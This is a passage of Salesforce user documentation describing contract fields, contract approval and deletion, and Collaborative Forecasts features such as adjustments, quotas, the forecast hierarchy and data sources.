Available in: Professional, Enterprise, Unlimited, and Developer Editions

A contract has the following fields, listed in alphabetical order. Depending on your page layout and field-level security settings,
some fields may not be visible or editable.

DescriptionField

Name of account associated with the contract.Account Name

Name of the person that activated the contract.Activated By

Activation date of the contract.Activated Date

City portion of billing address. Up to 40 characters are allowed
in this field.

Billing City

Country portion of billing address. Up to 80 characters are
allowed in this field.

Billing Country
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DescriptionField

The billing country for the address. Entry is selected from a
picklist of standard values.

Billing Country (beta)

State or province portion of billing address. Up to 80 characters
are allowed in this field.

Billing State/Province

The billing state or province for the address. Entry is selected
from a picklist of standard values.

Billing State/Province (beta)

Street address used for billing. Up to 255 characters are allowed
in this field.

Billing Street

Zip or postal code portion of billing address. Up to 20
characters are allowed in this field.

Billing Zip/Postal Code

User at your organization who authorized the contract.Company Signed By

Date that the contract was authorized.Company Signed Date

Division to which the contract belongs. This value is
automatically inherited from the related account. Available
only in organizations that use divisions to segment their data.

Contract Division

Last day the contract is in effect. Your administrator can
configure Salesforce to calculate Contract End Date based

Contract End Date

on Contract Start Date and Contract Term. If this
field is auto-calculated, it will not display on the contracts edit
page.

Title for the contract that distinguishes it from other contracts.Contract Name

Unique number automatically assigned to the contract.
Numbering for contracts starts at “100.” (Read only)

Contract Number

Administrators can modify the format and numbering for this
auto-number field.

User who owns the contract record.Contract Owner

First day that the contract is in effect.Contract Start Date

Number of months that the contract is in effect.Contract Term (months)

User who created the contract record.Created By

Contact on the account that authorized the contract.Customer Signed By

Date the contact signed the contract.Customer Signed Date

Title of the contact who signed the contract.Customer Signed Title

Statement describing the contract.Description

User who most recently changed the contract record.Last Modified By

Number of days before the contract end date you want to send
the notification, if the contract owner and account owner
wants to be notified of an upcoming contract expiration.

Owner Expiration Notice
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DescriptionField

City portion of primary mailing or shipping address. Up to
40 characters are allowed in this field.

Shipping City

Country portion of primary mailing or shipping address. Up
to 80 characters are allowed in this field.

Shipping Country

The shipping country for the address. Entry is selected from
a picklist of standard values.

Shipping Country (beta)

State or province portion of primary mailing or shipping
address. Up to 80 characters are allowed in this field.

Shipping State/Province

The shipping state or province for the address. Entry is selected
from a picklist of standard values.

Shipping State/Province (beta)

Primary mailing or shipping street address of account. Up to
255 characters are allowed in this field.

Shipping Street

Zip or postal code portion of primary mailing or shipping
address. Up to 20 characters are allowed in this field.

Shipping Zip/Postal Code

Any terms that you have specifically agreed to and want to
track in the contract.

Special Terms

Indicates the stage that the contract has reached in the contract
business process. Your organization can add values to this

Status

picklist within three system-defined contract status categories:
Draft, In Approval Process, and Activated. You
can use these status categories to track contracts within your
business process using reports and views.

Important: The Status field cannot be updated by
approval processes. If you want to use the contract
status as part of an approval process, we recommend
creating a custom status field.

Listing of custom links for contracts set up by your
administrator.

Custom Links

See Also:
Displaying and Editing Contracts
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Approving Contracts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Approve Contracts”To approve contracts:

Your organization may already have a process for approving contracts. For example, you may have one person designated for
each team to approve contracts. You may also have one administrator designated to activate contracts. If so, your Salesforce
administrator can customize Salesforce to give the appropriate people the permissions they need to perform their part of the
contract life-cycle.

Before you begin customizing Salesforce, define the life-cycle of a contract in your organization. Use the following basic
contract approval process to get started:

1. A user creates a contract. This user needs to have the “Edit” permission on contracts. All newly created contracts have a
Draft status.

2. The contract owner sends an approval request to have the contract approved by a team lead. The first approval request on
a contract changes its status to In Approval Process.

3. The team lead accepts or rejects the contract approval request. If rejected, the contract owner can make changes to the
contract and submit another approval request. The status remains In Approval Process whether the approval request was
accepted or rejected.

4. If accepted, a contract administrator activates the contract. Users with the “Activate Contracts” permission can activate a
contract. Activating a contract changes the contract status to Activated and makes the contract read only. Activated
contracts cannot be changed and only users with the “Delete Activated Contracts” permission can delete a contract with
Activated status.

Sending Approval Requests

To send an approval request for a contract:

1. Select the contract.
2. Click New in the Approval Requests related list.
3. Select the person you want to receive the approval request.
4. Enter any request comments.
5. Click Save. Salesforce sends an email approval request to the recipient you selected. The recipient can click a link in the

email to view the contract and click Approve to accept the contract or Reject to return the approval request. All approval
requests are tracked in the Approval Request related list.

Note: Approval request comments are limited to 4,000 characters. In Chinese, Japanese, or Korean, the limit is 1,333
characters.

Receiving Approval Requests

Use the Approval Pending list on the contracts home page to view all the contracts that require your approval. When you
receive an email approval request, click the included link to view the contract.
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• Click Approve to accept the contract as is and notify the contract owner that the request is approved. You will be prompted
to select an approval request status and enter any approval request comments. Click Save to send and save the approval
request.

• Click Reject to return the approval request. Select an approval request status and enter any comments that you want
attached to the approval request. Click Save to send your response and save the approval request.

Note:  You can use the standard contracts approval functionality alone or together with approval processes.

The Status field cannot be updated by approval processes. If you want to use the contract status as part of an approval
process, we recommend creating a custom status field.

See Also:
Activating Contracts
Displaying and Editing Contracts
Considerations for Creating Contracts

Deleting Contracts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Delete” on contracts

AND

“Read” on accounts

To delete inactivated contracts:

“Delete Activated Contracts”

AND

“Read” on accounts

To delete activated contracts:

To delete a contract, click Del next to the contract on the contracts list page. You can also delete a contract by clicking Delete
on the contract detail page.

When you delete a contract, all related notes, attachments, events and tasks, history, and approval requests are deleted.
Associated accounts are not deleted with the contract. The deleted contract is moved to the Recycle Bin. If you undelete the
contract, any related items are also restored.
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Searching for Contracts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on contractsTo view contracts:

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

You can also create a custom view to find contracts that match specific criteria.

FORECASTING SALES

PREDICTING AND PLANNING SALES CYCLES WITH
COLLABORATIVE FORECASTS

Forecasts Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Predict and plan the sales cycle from pipeline to closed sales, and manage sales expectations throughout the organization with
Forecasts. A forecast is an expression of expected sales revenue based on the gross rollup of a set of opportunities. Forecasts
include adjustments made by forecast users to their subordinates' forecasts as well as adjustments made by these subordinates
on the forecasts of the users below them in the forecast hierarchy. Forecasts are organized by forecast category and period in
the rollup table on the forecasts page.

Users can view forecasts and related opportunities by forecast category for just one person or everyone below them in the
forecast hierarchy. For example, they can see the July Best Case forecast for all the sales managers who report to them, all the
sales reps who report to any one of their managers, or just one individual. Users can also adjust the forecasts of subordinates
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one level beneath them. The user interface makes it simple to conduct status calls with an opportunity team because users can
move around it with ease. Use the flexibility of Forecasts to perform many tasks.

• Select and view forecasts using an interactive, expandable table.

• See forecast summary information for single months or quarters, and a multi-month or quarter range, for each forecast
category.

• Use a list of related opportunities that updates dynamically according to the forecast selection.

• Hover and click on a column boundary and adjust the width to view data more easily.

• Access related forecast details, including who made adjustments and original forecast amounts; adjust these details.

• Access opportunity records directly from the forecasts page.

• Move up and down through the forecasts hierarchy easily if you’re a forecast manager.

• View forecast amounts based on either revenue or quantity amounts.

• View forecasts in multiple currencies.

• View quota information on each user’s forecast page.

• Use Forecasts reports.

• Include the opportunities of your partner portal users in your forecasts.

See Also:
Understanding the Elements of a Forecast
Setting Up Forecasts
What's the difference between the Forecasting features?

Planning Your Migration from Customizable Forecasting
to Forecasts

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

“Customize Application”

AND

“Manage Quotas”

To manage quotas:

Note:  This information applies to organizations that want to migrate from Customizable Forecasts to Collaborative
Forecasts.

Collaborative Forecasts includes much of the same functionality as Customizable Forecasts. When migrating to Forecasts
from Customizable Forecasts keep the following in mind:
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• To enable Forecasts, Customizable Forecasts must be disabled first. Contact salesforce.com for assistance with disabling
Customizable Forecasts.

• Organizations using territory management or custom fiscal years can’t migrate to Forecasts at this time.

• The forecast history, overrides, reports, and sharing data from Customizable Forecasts are purged.

• Prior to migrating to Forecasts, consider exporting forecasting report data.

• Monthly forecasts is the default Forecasts period, however you can change your settings to quarterly.

• The forecast hierarchy is retained. However, to reduce the chance of potential data loss, consider migrating to Forecasts
immediately after disabling Customizable Forecasts. Since the hierarchy is retained, do not enable Forecasts users again
after migrating. Instead, after migration validate all hierarchies for accuracy.

Before migrating, make sure to review What's the difference between the Forecasting features? to determine if you can benefit
from the latest improvements offered in Forecasts.

See Also:
What's the difference between the Forecasting features?

Understanding the Elements of a Forecast
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

The Forecasts feature is designed to help you easily find and communicate opportunity and forecast information. This table
explains what a forecast is and defines the elements that affect and contribute to a forecast.

DefinitionConcept

A layer of detail you can add to a forecast.

An adjustment shows a forecasts manager’s judgment about
the final amount she or he expects the forecast's opportunities

Adjustment

to bring in at the close of the forecast period. Forecasts
managers can adjust forecasts that include gross opportunity
amounts only and also adjust forecasts that have already been
adjusted by someone else in their opportunity team. Remember
that an adjustment doesn't change the underlying gross
rollup—it just adds a layer of detail. Forecasts managers can
view adjustments subordinates make at every level of the
forecast hierarchy. They can adjust the forecasts of
subordinates one level beneath them in the forecast hierarchy
for the Commit and Best Case categories. Forecasts managers
can't adjust their own forecasts directly, but adjustments made
to their subordinates' forecasts roll up into their own forecasts.

The sum of all of a person’s owned revenue opportunities and
also his or her subordinates’ opportunities, without

Amount Without Adjustments
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DefinitionConcept

adjustments. Subordinates include everyone reporting up to
a person in the forecast hierarchy.

The forecast number as seen by the forecast owner. This is
the sum of the owner’s revenue opportunities and his or her

Amount Without Manager Adjustments

subordinates’ opportunities, including adjustments made on
the subordinates’ forecasts.  It doesn’t include adjustments made
by forecast managers above the owner in the forecast hierarchy.

The currency in which your organization’s corporate
headquarters reports revenue. Serves as the basis for all
currency conversion rates.

Corporate Currency

The type of data used for forecasting. Depending on an
organization’s settings, quantity- or revenue-based data

Data Source

sources, or both, can be used. Quantity forecasts roll up based
on the opportunity’s quantity field while revenue forecasts roll
up based on the opportunity’s amount field.

An expression of expected sales revenue based on the gross
rollup of a set of opportunities. Forecasts include adjustments

Forecast

made by forecast users to their subordinates' forecasts as well
as adjustments made by these subordinates on the forecasts of
the users below them in the forecast hierarchy. Forecasts are
organized by forecast category and period in the rollup table
on the forecasts page. Here, users can view forecasts and related
opportunities by forecast category for everyone below them in
the forecast hierarchy or just one person. For example, you
can see the July Best Case forecast for all the sales managers
who report to you, all the sales reps who report to any one of
your managers, or just one individual.

The revenue forecast from the forecast manager’s perspective
and the sum of the owner’s and subordinates’ opportunities,
including all forecast adjustments.

Forecast Amount

The category within the sales cycle that an opportunity is
assigned to based on its opportunity stage. The standard

Forecast Category

forecast categories are Pipeline, Best Case, Commit, Omitted,
and Closed. You can customize forecast category names for
your organization. The forecast categories display information
for that specific category; for example, Best Case only reflects
amounts in the Best Case category.

Either the organization's corporate currency or each forecast
owner's personal currency.

Forecast Currency

The currency that a user selects in which to display forecasts.
The selection must be one of the currencies enabled for use
in the organization and is made directly from the forecast page.

Forecast Display Currency

A nested, expandable list of forecasts users. It determines how
forecasts roll up within the organization, and who can view

Forecast Hierarchy

and adjust them. When the Forecasts feature is enabled for
your organization, a forecast hierarchy is automatically
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DefinitionConcept

generated based on your role hierarchy, but you may need to
add or remove managers, sales reps, or other users.

A forecasts-enabled user who owns opportunities or is a
forecast manager in the forecast hierarchy. Forecasts managers
can have their own opportunities.

Forecast Owner

The quantity forecast from the forecast manager’s perspective
and the sum of the owner’s and subordinates’ opportunities,
including all forecast adjustments.

Forecast Quantity

The date range you want displayed in your forecast. Depending
on the organization settings, the range can include months or
quarters.

Forecast Range

An expression of expected sales revenue based on the gross
value of a set of opportunities. A forecast always includes a

Gross Rollup

gross rollup amount and may also include one or more
adjustments.

The current stage of an opportunity, such as Prospect or
Proposal. Opportunity stage values correlate with forecast

Opportunity Stage

category values to determine how the opportunity contributes
to a forecast.

The sum of all of a person’s revenue opportunities, without
adjustments.

Owner Only Amount

The sum of all of a person’s quantity opportunities, without
adjustments.

Owner Only Quantity

A user’s default currency for quotas, certain forecasting
versions, and reports. This must be one of the active currencies

Personal Currency

for your organization. Your quota amounts display in your
display currency.

The sum of a person’s owned quantity opportunities and also
his or her subordinates’ opportunities, without adjustments.

Quantity Without Adjustments

Subordinates include everyone reporting up to a person in the
forecast hierarchy.

The forecast number as seen by the forecast owner. This is
the sum of the owner’s quantity opportunities and his or her

Quantity Without Manager Adjustments

subordinates’ opportunities, including adjustments made on
the subordinates’ forecasts.  It doesn’t include adjustments made
by forecast managers above the owner in the forecast hierarchy.

The sales goal assigned to a user on a monthly or quarterly
basis. A manager’s quota equals the amount the manager and

Quota

team are expected to generate together. The roll up is done
manually by users and managers, and either data
source–revenue or quantity—can be used.

The total expected revenue amount from the opportunities
that fit in a given category.

Revenue
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DefinitionConcept

The table at the top of a forecasts page. The Opportunities
list at the bottom of the forecasts page corresponds dynamically
with selections on the rollup table.

Rollup Table

A Forecasts user one or more levels beneath you in the forecast
hierarchy. You can view all of your subordinates' forecasts. If

Subordinate

your organization enables adjustments, you can view all of
your subordinates' adjustment information and you can adjust
the forecasts of subordinates one level beneath you in the
hierarchy. Forecast amounts and adjustments roll up into the
forecasts on your forecasts page.

See Also:
Forecasts Overview
Working with Forecasts

Working with Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Use the Forecasts tab to view and update forecasts. One section of the page displays forecast information and the other shows
associated opportunities.

Tip:  For the best experience when using Forecasts, keep your window sized to 1024 pixels or greater.

You can perform these tasks.

Display Selections

• View or hide quota data and, if more than one currency is enabled, change the forecast display currency. If your organization
has more than one data source enabled, select your data source, too.

• Change the individual forecast date range display by clicking Change.
• Refresh forecasts by clicking Refresh.
• View first-level subordinates' forecast information for a specific month by clicking .
• If your organization has Chatter enabled and you’re a forecast manager, hover over a subordinate’s name and then  to

display Chatter options such as Follow or Send a message.
• Hide details for a specific month by clicking .
• View a subordinate's forecast detail by hovering over the row and clicking Details >>.
• Find users who report to you in the forecasts hierarchy and move through the hierarchy by clicking Jump to....
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• Hover and click on a column boundary and adjust the width to view data more easily.

Adjustments

• Adjust a subordinate’s forecast by hovering over an amount and clicking .
•

View information for adjustments you've made by hovering over an amount that contains  next to it.
•

View information for adjustments your subordinates have made by hovering over an amount that contains .

Opportunities

• Display the opportunities for a person, specific month, or range of months by clicking on a row; the opportunities display
on the lower section of the page.

• Display the opportunities for a specific forecast category or item by clicking on a forecast amount.
• Hide the opportunities pane on the Forecasts page by clicking Hide.
• Display the opportunities pane on the Forecasts page by clicking Show.
• Adjust the height of the opportunities pane by hovering over the divider bar.
• Sort opportunities in the opportunities pane by clicking on a column heading.
• View an opportunity's detail by clicking on an opportunity name.
• Edit an opportunity in the opportunities pane by clicking Edit.
• View the account detail for an opportunity by clicking on the account name in the opportunity pane.
• View the profile of the opportunity owner by clicking on the owner's name in the opportunity pane.

See Also:
Forecasts Overview
Forecasts Best Practices

Understanding Monthly and Quarterly Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Depending on your organization’s Forecasts period settings, you can forecast in either monthly or quarterly ranges. You can
forecast up to 12 months or eight quarters in the future or past. In the forecasts page, the period selected by default in the
rollup table is the current month or quarter if the forecast range includes the current month or quarter. If not, then the first
month or quarter is selected by default in the rollup table instead. Whether your organization uses monthly or quarterly
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forecasts, forecast managers can still use quotas and make adjustments to their subordinates’ forecasts. Quota and adjustment
periods are based on the period settings.

See Also:
Changing Your Forecast Date Range Display
Forecasts Overview
Working with Forecasts

Changing Your Forecast Date Range Display
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Allow Forecasting”To use Forecasts:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

The Forecasts rollup table displays forecast amounts for individual months or quarters and a range of months or quarters,
depending on the organization’s Forecasts settings. When your administrator sets up Forecasts for your organization, a default
forecast date range display is selected. For example, your organization’s default might be three months into the future. You
can use this default or can change the date range displayed for your own forecast. To change your forecast date range display:

1. Click the Forecasts tab.
2. Click Change in the rollup table.
3. In Forecast Range, use the drop-down lists to select a beginning and ending period.
4. Click Save.

The range you select is relative to the current month or quarter. For example, in January you might select January as your
beginning month and April as the ending month. In February, the date range displayed becomes February to May, and so
forth. Your date range selection remains until you choose another one.

See Also:
Understanding Monthly and Quarterly Forecasts
Forecasts Overview
Working with Forecasts
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Understanding Revenue and Quantity Data Sources
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Data source refers to the type of data used for forecasting. Depending on an organization’s settings, quantity- or revenue-based
data sources, or both, can be used. Quantity forecasts roll up based on the opportunity’s quantity field while revenue forecasts
roll up based on the opportunity’s amount field. For example:

• A sales manager may need to forecast using revenue because the sales vice president sets quota amounts based on the US
Dollar.

• A sales representative may need to forecast using quantity because of a sales incentive to sell 10,000 units of a promotional
product.

If your organization has both options enabled, you can toggle your view between revenue and quantity forecasts, but you can’t
view both data sources at the same time.

You can adjust forecast amounts using either data source. However, adjustments made in one data source don’t display as
adjustments in another. For example, if you adjust a revenue amount from $100,000 to $90,000 and then switch your data
source from revenue to quantity, you won’t see an equivalent adjustment value in quantity. If you change the data source back
to revenue, you’ll again see your adjustment of $90,000.

See Also:
Changing Your Data Source
Forecasts Overview
Working with Forecasts
Working with Multiple Currencies in Forecasts

Changing Your Data Source
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Allow Forecasting”To use Forecasts:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).
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A data source is a type of data used for forecasting. Depending on an organization’s settings, quantity- or revenue-based data
sources, or both, can be used. Quantity forecasts roll up based on the opportunity’s quantity field while revenue forecasts roll
up based on the opportunity’s amount field. If your organization has more than one data source enabled, you can select the
type you want to use in your forecasts. To change the data source displayed:

1. Click  next to Amounts in Currency Type or Quantity (Units).
2. Select Revenue or Quantity (Units).
3. If you select Revenue and your organization has multiple currencies enabled, you can also select your display currency.

Under Currency, click (Change). A currency selection box opens for selecting a forecast display currency.

Note:  You can adjust forecast amounts using either data source. However, adjustments made in one data source don’t
display as adjustments in another. For example, if you adjust a revenue amount from $100,000 to $90,000 and then
switch your data source from revenue to quantity, you won’t see an equivalent adjustment value in quantity. If you
change the data source back to revenue, you’ll again see your adjustment of $90,000.

See Also:
Understanding Revenue and Quantity Data Sources
Forecasts Overview
Working with Forecasts
Working with Multiple Currencies in Forecasts
Forecasts Adjustments Overview

Forecasts Quotas Overview
Available in: Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

A forecast quota is the sales goal assigned to a user on a monthly or quarterly basis. A manager’s quota equals the amount the
manager and team are expected to generate together. The roll up is done manually by users and managers, and either data
source–revenue or quantity—can be used. For example, three sales representatives might have combined quota amounts of
$75,000 and their forecasts manager might have an individual quota of $30,000. The manager’s quota in this case is $105,000.
You can only edit direct subordinates’ quotas, and not your own; additionally, you must have the “Manage Quotas” permission.

If forecast quotas are enabled for your organization, quota data displays in two locations on a forecast page:

• A column that contains quota amounts for a specific period.

• A row that contains the percentage amounts attained for a specific period in a specific forecast category.

If you’re unsure about how to enter quota data or make updates to quotas, speak to your administrator.

1176

Forecasts Quotas OverviewPredicting and Planning Sales Cycles with Collaborative
Forecasts



Tip: Hover and click on a column boundary and adjust the width to view data more easily.

See Also:
Forecasts Overview
Working with Forecasts
Showing or Hiding Quota Information
Enabling Quotas in Forecasts

Forecasts Hierarchy Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

The forecast hierarchy is a nested, expandable list of forecasts users. It determines how forecasts roll up within the organization,
and who can view and adjust them. Based on your role, you can be added to or removed from the forecast hierarchy, or, your
position within the hierarchy can change. For example, you might be a sales representative with no direct reports, so you can
only view your own forecast. However, if your role changes and you become a sales manager, you could be added to the forecast
hierarchy as a forecast manager.

Users designated as forecast managers can view the forecasts and opportunities of users, including partner portal users, below
them in the forecast hierarchy. Forecast managers can also adjust the forecasts of direct reports. Only managers who made an
adjustment and those above them in the hierarchy can view the adjustment.

See Also:
Forecasts Adjustments Overview
Working with Forecasts

Forecasts Adjustments Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

You must be a forecast manager to adjust forecasts; additionally, adjustments must be enabled for your organization.
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An adjustment shows a forecasts manager’s judgment about the final amount she or he expects the forecast's opportunities to
bring in at the close of the forecast period. Forecasts managers can adjust forecasts that include gross opportunity amounts
only and also adjust forecasts that have already been adjusted by someone else in their opportunity team. Remember that an
adjustment doesn't change the underlying gross rollup—it just adds a layer of detail. Forecasts managers can view adjustments
subordinates make at every level of the forecast hierarchy. They can adjust the forecasts of subordinates one level beneath them
in the forecast hierarchy for the Commit and Best Case categories. Forecasts managers can't adjust their own forecasts directly,
but adjustments made to their subordinates' forecasts roll up into their own forecasts. Let’s say you’re a sales manager who’s
adjusted the forecast of one of your sales representatives from $2000 to $1500. Your vice president, who’s your forecast manager,
sees $1500 if he views your forecast; however, he might decide to adjust it to $2000 again.

A forecasts manager’s own forecasts page shows all of his or her forecasts and their related opportunity details. When managers
view a subordinate's forecasts page, they'll see the information from his or her view. Any adjustments they make on their own
forecast pages don't appear on the subordinate's forecasts page. Instead, they see that user's forecasts and any adjustments he
or she has made. For example, if you're a vice president of sales, on your own forecasts page, you might see a July Best Case
forecast of $1250 (including an adjustment you made) for one of your first-level subordinates, a sales manager. However, when
you view the sales manager's forecasts page, the July Best Case forecast might be $1200, because it doesn't include your
adjustment.

If your organization has more than one data source enabled, you can adjust forecast amounts using either data source. However,
adjustments made in one data source don’t display as adjustments in another. For example, if you adjust a revenue amount
from $100,000 to $90,000 and then switch your data source from revenue to quantity, you won’t see an equivalent adjustment
value in quantity. If you change the data source back to revenue, you’ll again see your adjustment of $90,000.

Note:  While you're viewing a forecasts page, your subordinates may be editing related opportunities or adjusting the
forecasts of their own subordinates. Or you may adjust one of your subordinates' forecasts from your own page. All
of these events change forecast amounts.

This table outlines who can view and adjust your forecasts.

Can adjust your forecasts?Can view your
forecasts?

User

NoYesYour manager's manager

YesYesYour manager

No. Adjustments to all your subordinates' forecasts roll up to your forecast
summary rows for each month and period range.

YesYou

NoNoYour direct report

NoNoYour non-direct report
subordinate

This table defines whose forecasts you can view and adjust.

Can you adjust forecasts?Can you view
forecasts?

User

NoNoYour manager's manager

NoNoYour manager
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Can you adjust forecasts?Can you view
forecasts?

User

No. Adjustments to all your subordinates' forecasts roll up to your forecast
summary rows for each month and the period range.

YesYou

YesYes. However,
when you select a

Your direct report

first-level
subordinate to
view his or her
forecasts page,
your own
adjustments are
not visible. You
see the same view
that the
subordinate sees.

No. Your direct reports can adjust their own direct reports' forecasts.Yes. You see the
same view that the
subordinate sees.

Your non-direct report
subordinate

If a forecast contains adjustments, you'll see one or more icons next to the amount. Here's what they mean.

DefinitionIcon

You adjusted the forecast. You'll see this indicator only on your own forecasts page because when
you drill down to another user's page, you see the page as that user sees it.

One of your subordinates adjusted the forecast. You'll see this indicator on both your own and
your subordinates' forecasts pages.

Both you and one or more subordinates adjusted the forecast. You'll see this indicator only on
your own forecasts page because when you drill down to a subordinate's page, you see the page
as that user sees it.

Save your adjustment.

Undo your adjustment and restore the previous value of the forecast. Hover over the button to
see a tool tip that tells you if the previous value includes an adjustment.
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DefinitionIcon

Remove your adjustment and restore the previous value, which may include someone else's
adjustment.

remove

See Also:
Adjusting Forecasts
Viewing and Editing Adjustments
Understanding Adjustments Purges
Changing Your Data Source
Refreshing Forecasts

Finding Forecasts with Jump to...
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Allow Forecasting”To use Forecasts:

“Override Forecasts”To adjust Forecasts:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

You must be a forecasts manager and have forecasts users reporting to you in the forecasts hierarchy to see Jump to....

You might have several people whose forecasts you’d like to view or adjust, and you might need to traverse through several
layers of the forecasts hierarchy if your organization is large. Finding forecasts is easy when you use Jump to....

1. Click Jump to....
2. Begin typing up to 20 characters in the text box that appears.
3. Select a name to go to that person’s forecast.
4. After you’re on a forecasts page, you can expand rows by clicking them as you do in your own forecast. Hover over names

to display the Details >> link. Navigation links with the names of forecast managers display at the top of the page as you
drill down through the forecast hierarchy. Click on these links to move quickly back up the hierarchy.

See Also:
Forecasts Hierarchy Overview
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Adjusting Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Allow Forecasting”To use Forecasts:

“Override Forecasts”To adjust Forecasts:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

You must be a forecast manager to adjust forecasts; additionally, adjustments must be enabled for your organization.

An adjustment shows a forecasts manager’s judgment about the final amount she or he expects the forecast's opportunities to
bring in at the close of the forecast period. Forecasts managers can adjust forecasts that include gross opportunity amounts
only and also adjust forecasts that have already been adjusted by someone else in their opportunity team. Remember that an
adjustment doesn't change the underlying gross rollup—it just adds a layer of detail.

Tip:  To quickly find a forecast, click Jump to....

To adjust a forecast:

1. When you find a forecast you want to adjust, hover over its cell and click .

2. Enter your adjustment in the field and click . A white dot ( ) appears next to the amount to show that you have adjusted
the forecast, and the adjustment rolls up to the period range total rows on the page.

Note:  Your organization might have both quantity and revenue enabled as data sources. If so, you can adjust forecast
amounts using either data source. However, adjustments made in one data source don’t display as adjustments in
another. For example, if you adjust a revenue amount from $100,000 to $90,000 and then switch your data source
from revenue to quantity, you won’t see an equivalent adjustment value in quantity. If you change the data source
back to revenue, you’ll again see your adjustment of $90,000.

See Also:
Forecasts Adjustments Overview
Viewing and Editing Adjustments
Understanding Adjustments Purges
Changing Your Data Source

1181

Adjusting ForecastsPredicting and Planning Sales Cycles with Collaborative
Forecasts



Viewing and Editing Adjustments
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Allow Forecasting”To use Forecasts:

“Override Forecasts”To adjust Forecasts:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

You must be a forecast manager to adjust forecasts; additionally, adjustments must be enabled for your organization.

You can view details about forecast adjustments that you or your subordinates have made, including who made the adjustments,
the adjusted amounts, and the original gross rollup (the forecast amount before adjustments). You can also edit adjustments
that you've made.

Tip:  To quickly find a forecast, click Jump to....

To edit an adjustment:

1. Expand the table to find the adjusted forecast that you want to view. An indicator displays next to adjusted forecasts.
2. Hover over the cell to view adjustment detail information.
3. Double-click the cell or click  to edit or remove any adjustments that you made.

If your organization has more than one data source enabled, you can adjust forecast amounts using either data source. However,
adjustments made in one data source don’t display as adjustments in another. For example, if you adjust a revenue amount
from $100,000 to $90,000 and then switch your data source from revenue to quantity, you won’t see an equivalent adjustment
value in quantity. If you change the data source back to revenue, you’ll again see your adjustment of $90,000.

See Also:
Forecasts Adjustments Overview
Adjusting Forecasts
Finding Forecasts with Jump to...
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Viewing Opportunity Details from a Forecast
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

From your forecasts detail page or the page of any subordinate, you can view the opportunities that make up a forecast—for
a month or month range, for all your subordinates or just one. Opportunities appear below the rollup table in a list that responds
to your selection. You can sort the opportunities by header. If you want to:

• View opportunities in all forecast categories for a month or month range, click its table row. All opportunities in all
categories appear in the opportunities list.

• View opportunities in any single forecast category for a single month or month range, click its cell within the row. The
opportunities in that category appear in the opportunities list.

Tip:  Remember that the forecast category is dependent on the opportunity stage. To change your forecast category
without updating the opportunity stage, go to the opportunity detail page. If your administrator added the
Forecast Category field to your page layout, you can click it to open a selection box. In the box, use the
Forecast Category drop-down list to update your forecast category.

• View the opportunities of a subordinate within a single month, click the subordinate's row within that month.

• Sort the opportunities list, click the header of any column. Most columns are sorted alphanumerically, but the Category
column is sorted by closest to or furthest from closing.

• Move through a list that's longer than a page, click Previous and Next or enter a page number in the Page field.

• Edit an opportunity that appears in the list, click Edit next to its name.

• See any Chatter posts related to the opportunity, click the opportunity's Opportunity Name link to go to its detail page.
Click Show Feed. Click Follow if you want Chatter notifications about all of the opportunity's activity.

• Adjust a column, place your cursor over the right or left margin of a column header and adjust the width.

See Also:
Editing Opportunities From a Forecasts Page
Understanding Partner Portal User Opportunities in Forecasts

1183

Viewing Opportunity Details from a ForecastPredicting and Planning Sales Cycles with Collaborative
Forecasts



Understanding Partner Portal User Opportunities in
Forecasts

Available in: Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Partner portal users are external to your organization but sell your products or services through indirect sales channels. Your
partner portal users use a portal to log into Salesforce. Partners can create opportunities, and users can assign opportunities to
them as well. Opportunities that a partner portal user creates can roll up to the forecast of the account owner; note that the
account owner must be the person’s forecast manager in the forecast hierarchy for the opportunities to roll up into the forecast.
For example, say Gordon Johnson:

• Owns a partner account called Acme

• Has an Acme contact named Anne Smith

• Anne is a partner portal user

• Anne reports to Gordon in the forecasts hierarchy

If Anne adds opportunities in her portal, Gordon sees those opportunities in his forecast; because Gordon is Anne’s forecast
manager, Gordon can adjust forecast amounts based on her opportunities and see how she’s tracking against her quota.
However, it’s important to note that partner portal users don’t have access to the Forecasts tab or any of its functionality.

See Also:
Viewing Opportunity Details from a Forecast
Editing Opportunities From a Forecasts Page
Partner Portal Overview

Editing Opportunities From a Forecasts Page
